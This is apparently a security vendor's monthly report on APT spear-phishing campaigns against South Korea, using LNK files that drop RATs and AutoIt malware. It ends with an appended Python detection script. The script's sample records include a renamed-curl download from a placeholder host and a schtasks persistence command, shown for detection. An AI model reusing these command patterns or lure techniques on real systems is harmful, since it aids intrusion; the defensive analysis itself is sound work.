December 2025 APT Attack Trend Report (South Korea)
Overview
AhnLab monitors APT (Advanced Persistent Threat) attacks in South Korea using its own infrastructure. This report covers the classification and statistics of APT attacks in South Korea that were identified over the course of one month in December 2025. It also provides an overview of the features of each attack type.

Figure 1. Statistics of APT attacks in South Korea in December 2025
In Korea, most of the identified APT attacks were distributed using the spear phishing method. Notably, attacks using LNK files accounted for the highest proportion in December 2025.
APT Group Targets South Korea
The following are the cases and features of APT attacks in Korea identified in December 2025.
1) Spear Phishing
Spear phishing is a type of phishing attack targeting specific individuals or groups. Unlike general phishing, attackers gather and analyze information about the target through a reconnaissance phase before executing the attack. Attackers use this gathered information to craft phishing emails, making recipients more likely to perceive them as legitimate. Additionally, email spoofing to forge sender addresses is common. Most spear phishing attacks involve malicious attachments or links within the email, prompting users to execute them.
The types of attacks distributed using this technique are as follows.
1.1 Attacks Using LNK Files
Type A
This type executes RAT malware. It is primarily distributed as compressed files alongside legitimate files. The LNK files confirmed to be distributed contain malicious PowerShell commands. They download malware using the Dropbox API or Google Drive, or create additional script files and obfuscated RAT malware on the user’s PC, such as in the “%PUBLIC%” directory. The RAT malware that is ultimately executed performs various malicious actions, such as keylogging and screen capture, according to the attacker’s commands. Confirmed RAT types include XenoRAT and RoKRAT.
The confirmed filenames are as follows.
| File Name |
|---|
| 20251216 Hyundai International Relations review article(**)Final Submission.lnk |
| lost_items_form.lnk |
| Notice_Submission of North Korean Defector Support Project Results and Balance Refund Guidance.lnk |
| Loan Verification.lnk |
| Baekjegobun-ro_Songpa-gu.lnk |
| Transaction Statement for Mr. Choi**.lnk |
Table 1. Identified filenames
Type B
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A key characteristic of this type is that it copies the curl.exe program under a different filename (e.g., WpqNoXz.exe) before executing it. Ultimately, both a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded files are registered in the Task Scheduler to ensure continuous execution. The malicious AutoIt script can perform functions such as executing commands, scanning directories, uploading files, and downloading files.
The confirmed filenames are as follows.
| File Name |
|---|
| 2025 North Korean Human Rights Youth Academy Lecture Topics.pdf.lnk |
| NordVPN Campaign Overview.pdf.lnk |
| YouTube Campaign Paid Partnership Proposal.docx.lnk |
Table 2. Confirmed filenames
The decoy files used to make it appear as if the user executed a legitimate file are as follows.

Figure 2. Identified decoy file
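As an added example (not code from AhnLab or this report), the following Python checks Sysmon-style process-creation records for three observable traits of the LNK cases above: curl.exe running under a different file name (the PE metadata still says curl.exe), a scheduled task pointing at an AutoIt script in a user-writable directory, and a shortcut disguised with a document double extension such as “.pdf.lnk”. The records, the field names and the WpqNoXz.exe/AutoIt3.exe paths are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation records (not telemetry from the report).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Users\Public\WpqNoXz.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"WpqNoXz.exe -o C:\Users\Public\a.au3 https://example.invalid/x"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://example.invalid/ok"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 1 /tn Updater '
                    r'/tr "C:\Users\Public\AutoIt3.exe C:\Users\Public\a.au3"'},
    {"Image": r"C:\Windows\explorer.exe", "OriginalFileName": "EXPLORER.EXE",
     "CommandLine": r'explorer.exe "NordVPN Campaign Overview.pdf.lnk"'},
]

# Document-looking name that is really a shortcut, e.g. "x.pdf.lnk" (Table 2 pattern).
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|hwp|txt)\.lnk\b", re.I)
AUTOIT_SCRIPT = re.compile(r"\.au3\b", re.I)
USER_WRITABLE = re.compile(r"\\(Users\\Public|AppData|Temp)\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the report's behaviours this record matches."""
    hits: List[str] = []
    img, orig, cmd = ev["Image"], ev["OriginalFileName"], ev["CommandLine"]
    # Type B: curl.exe copied under another name. The version resource still
    # says curl.exe, so OriginalFileName disagrees with the on-disk name.
    if orig.lower() == "curl.exe" and basename(img) != "curl.exe":
        hits.append("renamed-curl")
    # Type B: scheduled task that runs an AutoIt script from a user-writable path.
    if (basename(img) == "schtasks.exe" and "/create" in cmd.lower()
            and AUTOIT_SCRIPT.search(cmd) and USER_WRITABLE.search(cmd)):
        hits.append("scheduled-autoit")
    # Type B file names: LNK disguised with a document double extension.
    if DOUBLE_EXT.search(cmd):
        hits.append("deceptive-lnk-name")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map the index of each suspicious record to its matched behaviours."""
    return {i: h for i, e in enumerate(events) if (h := check_event(e))}


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits)
```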